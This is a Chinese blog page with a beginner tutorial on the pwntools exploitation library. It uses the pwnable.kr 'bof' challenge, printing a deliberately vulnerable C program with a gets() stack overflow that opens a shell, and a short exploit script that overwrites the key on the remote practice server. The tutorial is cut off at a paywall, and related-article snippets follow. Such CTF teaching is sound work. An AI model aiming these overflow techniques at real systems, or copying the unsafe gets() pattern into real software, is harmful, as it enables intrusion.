python3-pwntools教程_一步一步学pwntools

最新推荐文章于 2024-04-29 15:04:06 发布
最新推荐文章于 2024-04-29 15:04:06 发布
阅读量1.2k 收藏 2
点赞数
文章标签: python3-pwntools教程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39624429/article/details/111919813
版权

刚刚注册看雪,就来水一篇文章。

本来想发发我之前CTF的writeups,不过数量有点多,而且网上也有很多质量不错的wp,就发回之前写的pwntools新手教程。网上纯新手教程比较少,一般都是直接调用api,这篇主要是想给新手对pwntool一个更整体的认识。原文是我用英文写的,如果翻译的不好,请见谅。

英语原文:

下面开始正文:

pwntools是一个二进制利用框架。官方文档提供了详细的api规范。然而目前并没有一个很好的新手教程。因此我用了我过去的几篇writeup。由于本文只是用来介绍pwntools使用方法,我不会过于详细的讲解各种二进制漏洞攻击技术。

Pwntools的“Hello World”

栈溢出无疑是二进制攻击的“Hello World”。这里,我们用pwnable.kr的bof来进行展示。

#include

#include

#include

void func(int key){

char overflowme[32];

printf("overflow me : ");

gets(overflowme); // smash me!

if(key == 0xcafebabe){

system("/bin/sh");

}

else{

printf("Nah..\n");

}

}

int main(int argc, char* argv[]){

func(0xdeadbeef);

return 0;

}

pwntools脚本:

from pwn import *

c = remote("pwnable.kr", 9000)

c.sendline("AAAA" * 13 + p32(0xcafebabe))

c.interactive()

源码简洁明了,我们只需要将key改写成0xcafebabe。

现在我们重新看回pwntools脚本。第一行将pwntools提供的工具引入到我们的python上下文中。

remote("一个域名或者ip地址", 端口) 会连接到我们指定的地址及端口。 然后该函数会返回remote对象 (这里,我们将该对象保存到了变量 c)。remote对象主要用来

最低0.47元/天 解锁文章
weixin_39624429
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwntools-tutorial:Pwntools入门教程
05-04
Pwntools教程 该存储库包含一些有关pwntools(和pwntools)入门的基本教程。 这些教程不做任何努力来解释逆向工程或开发原语,而是假设了这一知识。 介绍 是一种工具包,可以使CTF期间的开发工作尽可能轻松,并使漏洞易于阅读。 每个人都有一百万次编写一些代码,每个人都有自己的方式。 Pwntools旨在以半标准方式提供所有这些功能,以便您可以停止将同一struct.unpack('>I', x)代码粘贴到周围,而使用更清晰的包装器,例如pack或p32或甚至p64(..., endian='big', sign=True) 。 除了围绕普通功能的便利包装外,它还提供了非常丰富的一组tubes ,这些tubes将您将要执行的所有IO封装在一个统一的界面中。 从本地漏洞利用转换为远程漏洞利用,或者通过SSH进行本地漏洞利用变成了单行更改。 最后但并非最不重要的一点,它还
python pwntools库 简介 主要功能有 网络 进程 文件 编解码 elf 汇编 调试
whatday的专栏
11-29 3100
Pwntools是一个工具包,使选手们在CTF期间的尽可能容易的编写EXP,并使EXP尽可能的容易阅读。有些代码每个人都写过无数次,而且每个人都有自己的方法。Pwntools的目标是以半标准的方式提供所有这些,这样你就可以停止复制粘贴相同的代码,而是使用更多稍微清晰的包装器,如pack或p32甚至。除了对日常的功能进行方便的包装外,它还提供了一套非常丰富的IO管道,将所有你曾经执行过的IO封装在一个统一的界面中。从本地攻击切换到远程攻击,或者通过SSH进行本地攻击,都只是修改一行代码的工作。
Pwntools 工具使用
潜心习安全
07-12 6610
简单介绍 pwntools 工具的使用
Pwn环境配置】kali安装python2,python3,pip2,pip3及pwntools
weixin_62621015的博客
04-14 2593
因为最近开始pwn,我写的脚本需要再python2环境下运行,而pwn库安装在python3,所以需要在python2下载pwntools,过程中遇到了许多问题,特此记录下来方便后续查看。
python3-pwntools教程_CTF PWN工具篇1
weixin_39943442的博客
02-20 1417
0x00 引子今年5月份参加红帽杯比赛,线下攻防赛,因为不懂PWN类题目,被吊打。很不爽,于是从6月初开始重新习汇编,操作系统到7月底,算告一段落。参考书上教程,从零完成一个简陋的操作系统,只有一个进程。这个过程中最大的收获是对汇编的深入理解,以及程序加载执行的过程的熟悉。这对PWN来说是非常好的基础。现在开始PWN类题目。先来梳理下常用的工具。网上有人介绍过,我自己从初者的角度来看待,尽...
beginning-python-3ed-master_python教程_python教程_
09-29
"beginning-python-3ed-master"目录下的源代码将按照章节结构组织,每章的代码示例都对应教程中的讲解。读者可以通过阅读和运行这些代码来加深理解,并动手实践编程。 总结,这本教程的源代码覆盖了Python 3的基础...
introducing-python-master_python教程_pet4eq_
10-03
"introducing-python-master"这个教程是为那些想要入门Python编程的初者设计的,它将带领你逐步了解Python的基础知识。 一、Python简介 Python是由Guido van Rossum在1991年开发的,它的设计哲强调代码的可读性...
opencv_python-4.4.0.46-cp38-cp38-manylinux2014_x86_64.whl
12-08
本地opencv_python_4.4.0.46 linux本地安装包 sudo pip3 install <下载目录>/opencv_python-4.4.0.46-cp38-cp38-manylinux2014_x86_64.whl
opencv_python-4.5.5.62-cp36-abi3-win_amd64.whl
01-06
opencv_python-4.5.5.62-cp36-abi3-win_amd64.whl 适用关于64位Windows系统
opencv_python-4.1.2.30-cp36-cp36m-manylinux1_x86_64.whl
12-25
python3.6对应的opencv_python-4.1.2版本.222222222222222222222222222222222222222222222222222222222222222
Python拖入文件路径获取&pwntools基本操作
luoqingxi000的博客
07-01 5120
import sys i = list(sys.argv) x=open(‘d:\x.txt’,‘w’) for i in range(10): x.write(i) print(’%s’%sys.argv) x.close()##
python3-pwntools教程_python的pwntools工具的日常使用
weixin_36050894的博客
12-23 1129
1.安装操作系统:ubuntu16.04环境准备:pythonpiplibssl-devlibffi-devpwntools安装:sudo apt-get install libffi-devsudo apt-get install libssl-devsudo apt-get install pythonsudo apt-get install python-pipsudo pip instal...
python3-pwntools教程_PwnTools常见用法
weixin_30539747的博客
12-23 1042
pwntools是一个ctf框架,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。安装:pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch,FreeBSD, OSX, 等等,徐州软件开发公司徐州徐软信息科技有限公司建议您确保安装以下系统库。BinutilsUbuntuMac OS XAlternate ...
python 3.5安装pwntools失败(c/_cffi_backend.c:2:20: fatal error: Python.h: No such file or directory)
最新发布
枯藤闲画云
04-29 197
尝试诸多办法后从github找到一个解决方案。
python3-pwntools教程_记一次five熬夜重装pwntools
weixin_29968283的博客
02-09 1051
今天是个好日子,今天是12.21,冬至今天不是好日子,做一道简单题的时候发现pwntools没装好呜呜呜这是一道基础的ret2shellcode,但是也不会做的我直奔wp去抄expfrom pwn import *p = remote('pwn2.jarvisoj.com', 9877)#p = process("./level1")#接收从下标为第14位到倒数第二位的字符串text = p.re...
python3代替python2中的pack函数
qq_39642801的博客
10-05 478
可以考虑重新定义pack函数,将pack函数的定义覆盖 根据相应环境将return 的p64()改为p32() from pwn import * def pack(useless,i): return p64(i)
windows python3安装使用pwntools
weixin_38031584的博客
08-25 2010
两种方法: 1.使用给定的命令安装 pip install --upgrade git+https://github.com/arthaud/python3-pwntools.git 2.github网络不可达使用gitee进行安装(如果失败多试几次) pip install git+https://gitee.com/mirrors/pwntools.git python3在拼接payload时可能会出现 payload = "A" * 0x28 + p32(canary) +
初步习CTF格式化字符串漏洞(待更新)
哔...的博客
03-25 951
初步习CTF格式化字符串漏洞(待更新) 文章目录初步习CTF格式化字符串漏洞(待更新)格式化字符串漏洞原理利用格式化字符串进行任意地址读利用格式化字符串进行任意地址写 https://veritas501.space/2017/04/28/格式化字符串漏洞习/ 先 List item 看看例子 int main() { char s[60]; char v6 FILE* s...
格式化字符串漏洞
Starr
03-22 1825
文章目录1. 再看printfprintf家族函数转换规则2. 漏洞原理危害防范3. 任意地址内存泄漏 Demo4. 覆盖栈数据5. 任意地址覆盖6. Pwntool Demo7. 工具8. 参考文章 格式化字符串漏洞基本已经销声匿迹了,不过在iot设备上可能还会存在。 1. 再看printf printf家族函数 #include <stdio.h> int printf(); int fprintf(); int dprintf(); int sprintf(); int snprintf(
make python-tenjin_1.1.1-1_all.deb确生成了python3-tenjin_1.1.1-1_all.deb 是为什么
05-27
这种情况可能是因为在生成 python-tenjin_1.1.1-1_all.deb 时,同时也生成了 python3-tenjin_1.1.1-1_all.deb。这是因为在构建软件包时,如果软件包支持 Python 2 和 Python 3 两个版本,通常会同时生成两个软件包,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值